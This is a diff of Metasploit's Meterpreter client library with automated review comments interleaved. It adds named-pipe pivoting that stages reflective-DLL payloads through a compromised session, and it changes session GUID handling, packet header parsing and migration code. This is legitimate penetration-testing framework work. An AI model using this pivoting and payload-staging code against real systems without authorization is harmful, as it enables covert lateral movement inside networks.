@@ -165,6 +165,14 @@ require 'msf/core/exe/segment_appender' # XXX: Add remaining ARMLE systems here end + if arch.index(ARCH_AARCH64) + if plat.index(Msf::Module::Platform::Linux) + return to_linux_aarch64_elf(framework, code) + end + + # XXX: Add remaining AARCH64 systems here + end + if arch.index(ARCH_PPC) if plat.index(Msf::Module::Platform::OSX) return to_osx_ppc_macho(framework, code) diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index 9e59c56061..27a3be7688 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -125,8 +125,6 @@ module Parser if @args[:blacklist] return false if @args[:blacklist].include?(@report_data[:host]) end - return false unless @report_data[:ports] - return false if @report_data[:ports].empty? return true end diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index 838d7f4814..2c0479c9af 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb @@ -53,7 +53,7 @@ private # if no session guid is given then we'll just pass the blank # guid through. this is important for stageless payloads - if opts[:stageless] == true + if opts[:stageless] == true || opts[:null_session_guid] == true session_guid = "\x00" * 16 else session_guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*') @@ -67,7 +67,7 @@ private session_guid # the Session GUID ] - session_data.pack('VVVA*A*') + session_data.pack('QVVA*A*') end def transport_block(opts) @@ -78,7 +78,8 @@ private lhost = "[#{lhost}]" end - url = "#{opts[:scheme]}://#{lhost}:#{opts[:lport]}" + url = "#{opts[:scheme]}://#{lhost}" + url << ":#{opts[:lport]}" if opts[:lport] url << "#{opts[:uri]}/" if opts[:uri] url << "?#{opts[:scope_id]}" if opts[:scope_id] diff --git a/lib/rex/post/hwbridge/extensions/automotive/automotive.rb b/lib/rex/post/hwbridge/extensions/automotive/automotive.rb index 9fc415fa5b..96e6e4a7fe 100644 
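Review bot: The new AARCH64 branch calls `to_linux_aarch64_elf(framework, code)`, which is not defined anywhere in this diff; confirm the helper lands with this commit (the pattern mirrors the other `to_linux_*_elf` arms), otherwise the branch raises NoMethodError for the first aarch64/linux caller. The `# XXX` marker for the remaining systems is consistent with the ARMLE block above it. The enclosing method starts and ends outside the hunk.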
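Review bot: `session_data.pack('QVVA*A*')` widens the first field to 64 bits but uses `Q`, which is native-endian, while the neighbouring `V` directives are explicitly little-endian; on a big-endian host the generated configuration block would lay those eight bytes out in the wrong order for the payload that parses them. Use the explicit form, `session_data.pack('Q<VVA*A*')`, so the layout no longer depends on the host running the framework. The hunk at `@@ -53,7 +53,7 @@` also spells the null GUID as `"\x00" * 16`; packet.rb in this same diff introduces `NULL_GUID` for that value and could be used here. The enclosing method starts outside the hunk.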
--- a/lib/rex/post/hwbridge/extensions/automotive/automotive.rb +++ b/lib/rex/post/hwbridge/extensions/automotive/automotive.rb @@ -119,11 +119,16 @@ class Automotive < Extension # TODO: Implement sending ISO-TP > 8 bytes data = [ data ] if data.is_a? Integer if data.size < 8 - data = padd_packet(data, opt['PADDING']) if opt.key? 'PADDING' + # Padding is handled differently after 0.0.3 + if Gem::Version.new(client.api_version) < Gem::Version.new('0.0.4') + data = padd_packet(data, opt['PADDING']) if opt.key? 'PADDING' + end data = array2hex(data).join request_str = "/automotive/#{bus}/isotpsend_and_wait?srcid=#{src_id}&dstid=#{dst_id}&data=#{data}" request_str += "&timeout=#{opt['TIMEOUT']}" if opt.key? "TIMEOUT" request_str += "&maxpkts=#{opt['MAXPKTS']}" if opt.key? "MAXPKTS" + request_str += "&padding=#{opt['PADDING']}" if opt.key? "PADDING" # Won't hurt to use in older versions + request_str += "&fc=#{opt['FC']}" if opt.key? "FC" # Force flow control return check_for_errors(client.send_request(request_str)) end nil diff --git a/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb b/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb index 6d3a3e0528..961c42c3fe 100644 --- a/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb +++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/automotive.rb @@ -174,6 +174,8 @@ class Console::CommandDispatcher::Automotive data = '' timeout = nil maxpackets = nil + flowcontrol = false + padding = nil cansend_opts = Rex::Parser::Arguments.new( '-h' => [ false, 'Help Banner' ], '-b' => [ true, 'Target bus'], 
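Review bot: `Gem::Version.new(client.api_version)` raises ArgumentError on a malformed string and, depending on the RubyGems version, on nil as well, which would abort `send_isotp_and_wait_for_response` before any request is built; guard it with `Gem::Version.correct?(client.api_version.to_s) && Gem::Version.new(client.api_version) < Gem::Version.new('0.0.4')`, or hoist the comparison into a small predicate with a one-line comment on why 0.0.4 is the cut-over. The appended `&padding=` and `&fc=` parameters are interpolated into the query string unencoded like the existing `timeout`/`maxpkts` ones, so a non-numeric value typed at the console reaches the bridge verbatim; converting at the dispatcher keeps the request well-formed. The enclosing method starts outside the hunk.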
@@ -181,6 +183,8 @@ class Console::CommandDispatcher::Automotive '-R' => [ true, 'Return ID'], '-D' => [ true, 'Data packet in Hex (Do not include ISOTP command size)'], '-t' => [ true, 'Timeout value'], + '-p' => [ true, 'Padding value, none if not specified'], + '-C' => [ false, 'Force flow control'], '-m' => [ true, 'Max packets to receive'] ) cansend_opts.parse(args) do |opt, _idx, val| @@ -199,6 +203,10 @@ class Console::CommandDispatcher::Automotive data = val when '-t' timeout = val.to_i + when '-p' + padding = val + when '-C' + flowcontrol = true when '-m' maxpackets = val.to_i end @@ -224,6 +232,8 @@ class Console::CommandDispatcher::Automotive opt = {} opt['TIMEOUT'] = timeout unless timeout.nil? opt['MAXPKTS'] = maxpackets unless maxpackets.nil? + opt['PADDING'] = padding unless padding.nil? + opt['FC'] = true unless flowcontrol == false result = client.automotive.send_isotp_and_wait_for_response(bus, id, ret, bytes, opt) if result.key? 'Packets' result['Packets'].each do |pkt| diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index d4bf04ec4f..e17302e9d7 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -12,6 +12,8 @@ require 'rex/post/meterpreter/object_aliases' require 'rex/post/meterpreter/packet' require 'rex/post/meterpreter/packet_parser' require 'rex/post/meterpreter/packet_dispatcher' +require 'rex/post/meterpreter/pivot' +require 'rex/post/meterpreter/pivot_container' module Rex module Post @@ -35,6 +37,7 @@ class Client include Rex::Post::Meterpreter::PacketDispatcher include Rex::Post::Meterpreter::ChannelContainer + include Rex::Post::Meterpreter::PivotContainer # # Extension name to class hash. 
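Review bot: `opt['FC'] = true unless flowcontrol == false` in the last hunk is a double negative around a variable that is only ever `false` or `true`; `opt['FC'] = true if flowcontrol` says the same thing. The `-p` value is stored as the raw string from `val` while the sibling `-t` and `-m` options are converted with `to_i`; if padding is a byte value (the automotive.rb hunk hands it to `padd_packet` and into the query string), `padding = val.to_i` at `when '-p'` keeps the options consistent, otherwise the help string should state the accepted format. The enclosing method starts and ends outside these hunks.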
@@ -85,7 +88,17 @@ class Client # Cleans up the meterpreter instance, terminating the dispatcher thread. # def cleanup_meterpreter - if not self.skip_cleanup + if self.pivot_session + self.pivot_session.remove_pivot_session(self.session_guid) + end + + self.pivot_sessions.keys.each do |k| + pivot = self.pivot_sessions[k] + pivot.pivoted_session.kill('Pivot closed') + pivot.pivoted_session.shutdown_passive_dispatcher + end + + unless self.skip_cleanup ext.aliases.each_value do | extension | extension.cleanup if extension.respond_to?( 'cleanup' ) end @@ -93,7 +106,7 @@ class Client dispatcher_thread.kill if dispatcher_thread - if not self.skip_cleanup + unless self.skip_cleanup core.shutdown rescue nil end @@ -117,11 +130,20 @@ class Client self.conn_id = opts[:conn_id] self.url = opts[:url] self.ssl = opts[:ssl] - self.expiration = opts[:expiration] - self.comm_timeout = opts[:comm_timeout] - self.retry_total = opts[:retry_total] - self.retry_wait = opts[:retry_wait] - self.passive_dispatcher = opts[:passive_dispatcher] + + self.pivot_session = opts[:pivot_session] + if self.pivot_session + self.expiration = self.pivot_session.expiration + self.comm_timeout = self.pivot_session.comm_timeout + self.retry_total = self.pivot_session.retry_total + self.retry_wait = self.pivot_session.retry_wait + else + self.expiration = opts[:expiration] + self.comm_timeout = opts[:comm_timeout] + self.retry_total = opts[:retry_total] + self.retry_wait = opts[:retry_wait] + self.passive_dispatcher = opts[:passive_dispatcher] + end self.response_timeout = opts[:timeout] || self.class.default_timeout self.send_keepalives = true @@ -131,7 +153,7 @@ class Client self.encode_unicode = false self.aes_key = nil - self.session_guid = '00000000-0000-0000-0000-000000000000' + self.session_guid = opts[:session_guid] || "\x00" * 16 # The SSL certificate is being passed down as a file path if opts[:ssl_cert] 
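Review bot: In `cleanup_meterpreter`, an exception from `pivot.pivoted_session.kill` or `shutdown_passive_dispatcher` escapes the `pivot_sessions` loop and skips both the remaining pivots and the extension cleanup and dispatcher-thread kill that follow, leaving threads and child sessions alive exactly when teardown is already going wrong. Each pivot's teardown should be isolated so one failure cannot block the rest, as below. Iterating over `keys` is safe against removal during the loop; whether `pivot_sessions` should also be cleared afterwards so a repeated cleanup is a no-op depends on `PivotContainer`, which is not in this diff. Note the existing `skip_cleanup` gate applies only to the extension and core shutdown, not to the new pivot teardown.
```ruby
self.pivot_sessions.keys.each do |k|
  pivot = self.pivot_sessions[k]
  begin
    pivot.pivoted_session.kill('Pivot closed')
    pivot.pivoted_session.shutdown_passive_dispatcher
  rescue StandardError => e
    elog("Failed to tear down pivot #{k}: #{e.class}: #{e.message}")
  end
end
# … unchanged: skip_cleanup-gated extension and core shutdown …
```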
@@ -143,32 +165,19 @@ class Client end end - if opts[:passive_dispatcher] - initialize_passive_dispatcher + initialize_passive_dispatcher if opts[:passive_dispatcher] - register_extension_alias('core', ClientCore.new(self)) + register_extension_alias('core', ClientCore.new(self)) - initialize_inbound_handlers - initialize_channels + initialize_inbound_handlers + initialize_channels + initialize_pivots - # Register the channel inbound packet handler - register_inbound_handler(Rex::Post::Meterpreter::Channel) - else - # Switch the socket to SSL mode and receive the hello if needed - if capabilities[:ssl] and not opts[:skip_ssl] - swap_sock_plain_to_ssl() - end + # Register the channel and pivot inbound packet handlers + register_inbound_handler(Rex::Post::Meterpreter::Channel) + register_inbound_handler(Rex::Post::Meterpreter::Pivot) - register_extension_alias('core', ClientCore.new(self)) - - initialize_inbound_handlers - initialize_channels - - # Register the channel inbound packet handler - register_inbound_handler(Rex::Post::Meterpreter::Channel) - - monitor_socket - end + monitor_socket end def swap_sock_plain_to_ssl @@ -478,6 +487,10 @@ class Client # attr_accessor :passive_dispatcher # + # Reference to a session to pivot through + # + attr_accessor :pivot_session + # # Flag indicating whether to hex-encode UTF-8 file names and other strings # attr_accessor :encode_unicode diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index cb016d61a3..69d509ef89 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -3,6 +3,7 @@ require 'rex/post/meterpreter/packet' require 'rex/post/meterpreter/extension' require 'rex/post/meterpreter/client' +require 'msf/core/payload/transport_config' # Used to generate a reflective DLL when migrating. This is yet another # argument for moving the meterpreter client into the Msf namespace. 
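Review bot: The rewritten tail of `initialize` drops the `capabilities[:ssl] and not opts[:skip_ssl]` branch that called `swap_sock_plain_to_ssl`, yet that method definition survives as context right after the hunk, and `monitor_socket` is now invoked unconditionally where the old code ran it only on the non-passive path. If both changes are intentional, a short comment above `monitor_socket` stating why the plain-to-SSL upgrade and the passive-dispatcher guard are no longer needed would spare the next reader a history dig; if not, restore `monitor_socket unless opts[:passive_dispatcher]` and the SSL swap. Either way `swap_sock_plain_to_ssl` should be removed or its remaining callers named. `initialize` starts outside the hunk.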
@@ -33,24 +34,12 @@ module Meterpreter ### class ClientCore < Extension - UNIX_PATH_MAX = 108 - DEFAULT_SOCK_PATH = "/tmp/meterpreter.sock" - - METERPRETER_TRANSPORT_SSL = 0 - METERPRETER_TRANSPORT_HTTP = 1 - METERPRETER_TRANSPORT_HTTPS = 2 - - TIMEOUT_SESSION = 24*3600*7 # 1 week - TIMEOUT_COMMS = 300 # 5 minutes - TIMEOUT_RETRY_TOTAL = 60*60 # 1 hour - TIMEOUT_RETRY_WAIT = 10 # 10 seconds - - VALID_TRANSPORTS = { - 'reverse_tcp' => METERPRETER_TRANSPORT_SSL, - 'reverse_http' => METERPRETER_TRANSPORT_HTTP, - 'reverse_https' => METERPRETER_TRANSPORT_HTTPS, - 'bind_tcp' => METERPRETER_TRANSPORT_SSL - } + VALID_TRANSPORTS = [ + 'reverse_tcp', + 'reverse_http', + 'reverse_https', + 'bind_tcp' + ] include Rex::Payloads::Meterpreter::UriChecksum @@ -67,6 +56,44 @@ class ClientCore < Extension # ## + # + # create a named pipe pivot + # + def create_named_pipe_pivot(opts) + request = Packet.create_request('core_pivot_add') + request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name]) + + + c = Class.new(::Msf::Payload) + c.include(::Msf::Payload::Stager) + c.include(::Msf::Payload::TransportConfig) + + # Include the appropriate reflective dll injection module for the target process architecture... + if opts[:arch] == ARCH_X86 + c.include(::Msf::Payload::Windows::MeterpreterLoader) + elsif opts[:arch] == ARCH_X64 + c.include(::Msf::Payload::Windows::MeterpreterLoader_x64) + end + + stage_opts = { + force_write_handle: true, + datastore: { + 'PIPEHOST' => opts[:pipe_host], + 'PIPENAME' => opts[:pipe_name] + } + } + + stager = c.new() + + stage_opts[:transport_config] = [stager.transport_config_reverse_named_pipe(stage_opts)] + stage = stager.stage_payload(stage_opts) + + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage) + request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA_SIZE, stage.length) + + response = self.client.send_request(request) + end + # # Get a list of loaded commands for the given extension. # 
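Review bot: `VALID_TRANSPORTS` is now a plain array literal without `.freeze`, so any caller can mutate the shared constant at runtime; `].freeze` on the closing line keeps it immutable and `include?` on four strings is fine. Dropping the old hash also removed the `METERPRETER_TRANSPORT_*` and `TIMEOUT_*` constants, so anything outside this diff that still references them would raise NameError and is worth a grep before merge.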
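Review bot: In `create_named_pipe_pivot`, an `opts[:arch]` that is neither `ARCH_X86` nor `ARCH_X64` includes no loader module, so the failure surfaces later as a NoMethodError out of `stage_payload` rather than a clear error; add `else raise ArgumentError, "Unsupported architecture for named pipe pivot: #{opts[:arch]}"` to the if/elsif. The method has no documentation beyond "create a named pipe pivot": the expected keys (`:pipe_name`, `:pipe_host`, `:arch`) and the fact that the server response is the return value should be stated with `@param`/`@return`. The local `response` is assigned but never read, and `c.new()` can drop its empty parentheses.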
@@ -320,7 +347,7 @@ class ClientCore < Extension # def set_session_guid(guid) request = Packet.create_request('core_set_session_guid') - request.add_tlv(TLV_TYPE_SESSION_GUID, [guid.gsub(/-/, '')].pack('H*')) + request.add_tlv(TLV_TYPE_SESSION_GUID, guid) client.send_request(request) @@ -338,10 +365,7 @@ class ClientCore < Extension response = client.send_request(*args) - bytes = response.get_tlv_value(TLV_TYPE_SESSION_GUID) - - parts = bytes.unpack('H*')[0] - [parts[0, 8], parts[8, 4], parts[12, 4], parts[16, 4], parts[20, 12]].join('-') + response.get_tlv_value(TLV_TYPE_SESSION_GUID) end # 
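Review bot: `set_session_guid` now sends `guid` through as raw bytes without the previous normalisation, so a caller that still passes the dashed textual form would silently send a 36-byte value; a guard such as `raise ArgumentError, 'session GUID must be 16 raw bytes' unless guid && guid.bytesize == GUID_SIZE` (packet.rb adds `GUID_SIZE` in this same diff) catches that at the boundary. Correspondingly `get_session_guid` now returns the raw bytes, so any caller that displayed the dashed form must format it itself; that is not visible here and is worth checking. `get_session_guid` starts outside the second hunk.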
@@ -541,51 +565,17 @@ class ClientCore < Extension raise RuntimeError, 'Cannot migrate into current process', caller end - if client.platform == 'linux' - if writable_dir.to_s.strip.empty? - writable_dir = tmp_folder - end - - stat_dir = client.fs.filestat.new(writable_dir) - - unless stat_dir.directory? - raise RuntimeError, "Directory #{writable_dir} not found", caller - end - # Rex::Post::FileStat#writable? isn't available - end - migrate_stub = generate_migrate_stub(target_process) migrate_payload = generate_migrate_payload(target_process) # Build the migration request request = Packet.create_request('core_migrate') - if client.platform == 'linux' - socket_path = File.join(writable_dir, Rex::Text.rand_text_alpha_lower(5 + rand(5))) - - if socket_path.length > UNIX_PATH_MAX - 1 - raise RuntimeError, 'The writable dir is too long', caller - end - - pos = migrate_payload.index(DEFAULT_SOCK_PATH) - - if pos.nil? - raise RuntimeError, 'The meterpreter binary is wrong', caller - end - - migrate_payload[pos, socket_path.length + 1] = socket_path + "\x00" - - ep = elf_ep(migrate_payload) - request.add_tlv(TLV_TYPE_MIGRATE_BASE_ADDR, 0x20040000) - request.add_tlv(TLV_TYPE_MIGRATE_ENTRY_POINT, ep) - request.add_tlv(TLV_TYPE_MIGRATE_SOCKET_PATH, socket_path, false, client.capabilities[:zlib]) - end - - request.add_tlv( TLV_TYPE_MIGRATE_PID, target_pid ) - request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length ) - request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib]) - request.add_tlv( TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length ) - request.add_tlv( TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib]) + request.add_tlv(TLV_TYPE_MIGRATE_PID, target_pid) + request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD_LEN, migrate_payload.length) + request.add_tlv(TLV_TYPE_MIGRATE_PAYLOAD, migrate_payload, false, client.capabilities[:zlib]) + request.add_tlv(TLV_TYPE_MIGRATE_STUB_LEN, migrate_stub.length) + 
request.add_tlv(TLV_TYPE_MIGRATE_STUB, migrate_stub, false, client.capabilities[:zlib]) if target_process['arch'] == ARCH_X64 request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64 @@ -614,7 +604,7 @@ class ClientCore < Extension # Sleep for 5 seconds to allow the full handoff, this prevents # the original process from stealing our loadlib requests ::IO.select(nil, nil, nil, 5.0) - else + elsif client.pivot_session.nil? # Prevent new commands from being sent while we finish migrating client.comm_mutex.synchronize do # Disable the socket request monitor @@ -686,11 +676,8 @@ class ClientCore < Extension # Indicates if the given transport is a valid transport option. # def valid_transport?(transport) - if transport - VALID_TRANSPORTS.has_key?(transport.downcase) - else - false - end + return false if transport.nil? + VALID_TRANSPORTS.include?(transport.downcase) end # @@ -751,6 +738,8 @@ private case t[:url] when /^tcp/i c.include(::Msf::Payload::Windows::MigrateTcp) + when /^pipe/i + c.include(::Msf::Payload::Windows::MigrateNamedPipe) when /^http/i # Covers HTTP and HTTPS c.include(::Msf::Payload::Windows::MigrateHttp) @@ -760,6 +749,8 @@ private case t[:url] when /^tcp/i c.include(::Msf::Payload::Windows::MigrateTcp_x64) + when /^pipe/i + c.include(::Msf::Payload::Windows::MigrateNamedPipe_x64) when /^http/i # Covers HTTP and HTTPS c.include(::Msf::Payload::Windows::MigrateHttp_x64) @@ -790,11 +781,11 @@ private opts[:lhost] = nil end - transport = VALID_TRANSPORTS[opts[:transport]] + transport = opts[:transport].downcase request = Packet.create_request(method) - scheme = opts[:transport].split('_')[1] + scheme = transport.split('_')[1] url = "#{scheme}://#{opts[:lhost]}:#{opts[:lport]}" if opts[:luri] && opts[:luri].length > 0 @@ -824,7 +815,7 @@ private end # do more magic work for http(s) payloads - unless opts[:transport].ends_with?('tcp') + unless transport.ends_with?('tcp') if opts[:uri] url << '/' unless opts[:uri].start_with?('/') url << opts[:uri] 
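Review bot: `transport = opts[:transport].downcase` in the `@@ -790,11 +781,11 @@` hunk raises NoMethodError when `opts[:transport]` is nil, whereas the replaced `VALID_TRANSPORTS[opts[:transport]]` lookup yielded nil without raising; unless every caller goes through `valid_transport?` first (not visible here), `raise ArgumentError, 'transport is required' if opts[:transport].nil?` before the downcase gives a clear failure. Note also that `transport` is now a String where it used to be an integer transport id, and the later unchanged line `request.add_tlv(TLV_TYPE_TRANS_TYPE, transport)` still sends it. The enclosing method starts outside the hunk.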
@@ -838,7 +829,7 @@ private opts[:ua] ||= 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' request.add_tlv(TLV_TYPE_TRANS_UA, opts[:ua]) - if transport == METERPRETER_TRANSPORT_HTTPS && opts[:cert] + if transport == 'reverse_https' && opts[:cert] hash = Rex::Socket::X509Certificate.get_cert_file_hash(opts[:cert]) request.add_tlv(TLV_TYPE_TRANS_CERT_HASH, hash) end @@ -862,24 +853,7 @@ private request.add_tlv(TLV_TYPE_TRANS_TYPE, transport) request.add_tlv(TLV_TYPE_TRANS_URL, url) - return request - end - - - # - # Create a full migration payload specific to the target process. - # - def generate_migrate_payload(target_process) - case client.platform - when 'windows' - blob = generate_migrate_windows_payload(target_process) - when 'linux' - blob = generate_migrate_linux_payload - else - raise RuntimeError, "Unsupported platform '#{client.platform}'" - end - - blob + request end # @@ -905,34 +879,18 @@ private end # - # Create a full Linux-specific migration payload specific to the target process. + # Create a full migration payload specific to the target process. # - def generate_migrate_linux_payload - MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin') - end - - # - # Determine the elf entry poitn for the given payload. - # - def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep - end - - # - # Get the tmp folder for the session. - # - def tmp_folder - tmp = client.sys.config.getenv('TMPDIR') - - if tmp.to_s.strip.empty? - tmp = '/tmp' + def generate_migrate_payload(target_process) + case client.platform + when 'windows' + blob = generate_migrate_windows_payload(target_process) + else + raise RuntimeError, "Unsupported platform '#{client.platform}'" end - tmp + blob end - end end; end; end diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 4fb1152109..f3847a9957 100644 
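Review bot: In the `@@ -905` hunk `generate_migrate_payload` assigns `blob` in its single `when` branch only to return it two lines later; the `case` can be the method's value (`when 'windows' then generate_migrate_windows_payload(target_process)`), and `raise RuntimeError, "..."` is just `raise "..."`. Dropping the `when 'linux'` branch means Linux sessions now reach the "Unsupported platform" error from this method — if that is intended (the Linux migration payload is removed in the same hunk), the header comment should say so, e.g. `# Only Windows targets have a migration payload; other platforms raise`.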
--- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -80,7 +80,6 @@ class Kiwi < Extension elsif output =~ /^ERROR.*SamLookupNamesInDomain/m result[:error] = 'Invalid user.' else - STDERR.puts(output) result[:error] = 'Unknown error.' end else diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index 5160db7842..5a00e8a111 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb @@ -17,7 +17,7 @@ TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601 TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630 TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631 TLV_TYPE_PRIVILEGE = TLV_META_TYPE_STRING | 632 - + ## # # Fs diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index 15b7ca1e2a..8c81169242 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb @@ -113,6 +113,15 @@ TLV_TYPE_SYM_KEY_TYPE = TLV_META_TYPE_UINT | 551 TLV_TYPE_SYM_KEY = TLV_META_TYPE_RAW | 552 TLV_TYPE_ENC_SYM_KEY = TLV_META_TYPE_RAW | 553 +# +# Pivots +# +TLV_TYPE_PIVOT_ID = TLV_META_TYPE_RAW | 650 +TLV_TYPE_PIVOT_STAGE_DATA = TLV_META_TYPE_RAW | 651 +TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_META_TYPE_UINT | 652 +TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_META_TYPE_STRING | 653 + + # # Core flags # @@ -120,6 +129,12 @@ LOAD_LIBRARY_FLAG_ON_DISK = (1 << 0) LOAD_LIBRARY_FLAG_EXTENSION = (1 << 1) LOAD_LIBRARY_FLAG_LOCAL = (1 << 2) +# +# Sane defaults +# +GUID_SIZE = 16 +NULL_GUID = "\x00" * GUID_SIZE + ### # # Base TLV (Type-Length-Value) class 
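Review bot: `NULL_GUID = "\x00" * GUID_SIZE` in the `@@ -120` hunk of packet.rb is a mutable String constant that is later both compared against (`self.session_guid == NULL_GUID`) and used as a default in `Packet#to_r`; `NULL_GUID = ("\x00" * GUID_SIZE).freeze` stops an accidental in-place edit from silently changing every comparison. The `# Sane defaults` heading explains neither value — `# Session GUID size in bytes, and the all-zero GUID a session carries until the first inbound packet assigns one` describes how this commit uses them.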
@@ -227,6 +242,11 @@ class Tlv when TLV_TYPE_SYM_KEY; "SYM-KEY" when TLV_TYPE_ENC_SYM_KEY; "ENC-SYM-KEY" + when TLV_TYPE_PIVOT_ID; "PIVOT-ID" + when TLV_TYPE_PIVOT_STAGE_DATA; "PIVOT-STAGE-DATA" + when TLV_TYPE_PIVOT_STAGE_DATA_SIZE; "PIVOT-STAGE-DATA-SIZE" + when TLV_TYPE_PIVOT_NAMED_PIPE_NAME; "PIVOT-NAMED-PIPE-NAME" + #when Extensions::Stdapi::TLV_TYPE_NETWORK_INTERFACE; 'network-interface' #when Extensions::Stdapi::TLV_TYPE_IP; 'ip-address' #when Extensions::Stdapi::TLV_TYPE_NETMASK; 'netmask' @@ -624,6 +644,8 @@ class Packet < GroupTlv attr_accessor :created_at attr_accessor :raw attr_accessor :session_guid + attr_accessor :encrypt_flags + attr_accessor :length ## # @@ -654,11 +676,10 @@ class Packet < GroupTlv ### XOR_KEY_SIZE = 4 - SESSION_GUID_SIZE = 16 ENCRYPTED_FLAGS_SIZE = 4 PACKET_LENGTH_SIZE = 4 PACKET_TYPE_SIZE = 4 - PACKET_HEADER_SIZE = XOR_KEY_SIZE + SESSION_GUID_SIZE + ENCRYPTED_FLAGS_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE + PACKET_HEADER_SIZE = XOR_KEY_SIZE + GUID_SIZE + ENCRYPTED_FLAGS_SIZE + PACKET_LENGTH_SIZE + PACKET_TYPE_SIZE AES_IV_SIZE = 16 @@ -786,7 +807,7 @@ class Packet < GroupTlv def to_r(session_guid = nil, key = nil) xor_key = (rand(254) + 1).chr + (rand(254) + 1).chr + (rand(254) + 1).chr + (rand(254) + 1).chr - raw = [(session_guid || '00' * SESSION_GUID_SIZE).gsub(/-/, '')].pack('H*') + raw = (session_guid || NULL_GUID).dup tlv_data = GroupTlv.instance_method(:to_r).bind(self).call if key && key[:key] && key[:type] == ENC_FLAG_AES256 @@ -817,6 +838,12 @@ class Packet < GroupTlv end end + def parse_header! + xor_key = self.raw.unpack('a4')[0] + data = xor_bytes(xor_key, self.raw[0..PACKET_HEADER_SIZE]) + _, self.session_guid, self.encrypt_flags, self.length, self.type = data.unpack('a4a16NNN') + end + # # Override the function that reads from a raw byte stream so # that the XORing of data is included in the process prior to 
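Review bot: `parse_header!` reads the header with no check that `self.raw` actually holds `PACKET_HEADER_SIZE` bytes, so a short or truncated inbound packet yields nils for `session_guid`/`encrypt_flags`/`length`/`type` and the failure only surfaces later in `from_r` (next hunk) as an obscure xor/unpack error; a guard such as `raise ArgumentError, 'packet shorter than header' if self.raw.nil? || self.raw.length < PACKET_HEADER_SIZE` at the top fails fast on untrusted input. The slice `self.raw[0..PACKET_HEADER_SIZE]` is an inclusive range and copies one byte past the header — harmless for `unpack`, but `self.raw[0, PACKET_HEADER_SIZE]` says what is meant. `self.length` is the peer-declared length and the `from_r` hunk passes it straight into `super([self.length, self.type, raw].pack('NNA*'))` without comparing it to the bytes actually present; worth a check or at least a comment if GroupTlv relies on it. A header comment like `# Decodes the XOR'd packet header in #raw into session_guid, encrypt_flags, length and type; leaves the TLV body untouched` would match the file's other methods.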
@@ -824,11 +851,11 @@ class Packet < GroupTlv # the TLV values. # def from_r(key=nil) + self.parse_header! xor_key = self.raw.unpack('a4')[0] - data = xor_bytes(xor_key, self.raw) - _, self.session_guid, encrypt_flags, length, type = data.unpack('a4a16NNN') - raw = decrypt_packet(key, encrypt_flags, data[PACKET_HEADER_SIZE..-1]) - super([length, type, raw].pack('NNA*')) + data = xor_bytes(xor_key, self.raw[PACKET_HEADER_SIZE..-1]) + raw = decrypt_packet(key, self.encrypt_flags, data) + super([self.length, self.type, raw].pack('NNA*')) end # diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb index 6bea6f8683..3699eaea1f 100644 --- a/lib/rex/post/meterpreter/packet_dispatcher.rb +++ b/lib/rex/post/meterpreter/packet_dispatcher.rb @@ -137,7 +137,7 @@ module PacketDispatcher if req.body and req.body.length > 0 packet = Packet.new(0) packet.add_raw(req.body) - packet.from_r(self.tlv_enc_key) + packet.parse_header! dispatch_inbound_packet(packet) end cli.send_response(resp) 
